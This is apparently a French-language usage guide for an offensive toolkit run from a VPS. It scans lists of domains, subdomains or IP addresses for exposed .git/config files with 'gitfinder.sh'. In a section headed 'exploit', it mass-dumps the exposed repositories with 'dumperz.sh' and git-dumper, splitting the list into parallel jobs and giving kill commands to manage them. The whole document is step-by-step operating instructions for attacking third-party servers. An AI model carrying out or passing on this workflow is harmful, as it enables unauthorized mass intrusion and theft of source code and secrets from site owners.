#1)
Pour installer le script sur ton vps :

bash install.sh

--

#2) Pour commencer a chercher les NDD ou IP liste avec des vuln :

nohup bash gitfinder.sh ip.txt 100 &
#100 etant le nombre de thread mais tu peux mettre +
#taliste.txt ca peut etre aussi bien une liste de ndd de subdomains ou liste d'ip
#si tu veux savoir si ca tourne encore tu fais ps aux | grep "gitfinder\.sh"
#ensuite cv te sortir un fichier vulns.txt quand c finito
#si le scrip n'a pas finis pour enlever les /config tu fais cette commande :
sed -i 's/\/config//g' vulns.txt

--

#3) exploit:

nohup bash dumperz.sh vulns.txt &
#si tu veux multi thread tu fais :
split -l 170 vulns.txt lol
for i in $(ls lol*); do nohup bash dumperz.sh $i &done&
#-l 10 etant le nombre de ligne par fichier que tu veux (si le fichier vulns.txt fait 1000 lignes et que tu veux 10 threads bah tu met 100 fin ta compris)
#lol etant juste un prefix pour les fichiers qui vont se creer pour diviser la liste vulns en plusieurs fichier
#si tu veux savoir si ca tourne encore tu fais:
ps aux | grep "dumperz\.sh"
ou alors
tail -f nohup.out (ctr+c pour quitter)
#si le nohup bloque tu fais:
kill -9 $(ps aux | grep "git\-dumper" | awk '{print $2}' | tr '\n' ' ')
#si tu veux tout aretter tu fais:
kill -9 $(ps aux | grep "dumperz\.sh" | awk '{print $2}' | tr '\n' ' ')
kill -9 $(ps aux | grep "git\-dumper" | awk '{print $2}' | tr '\n' ' ')





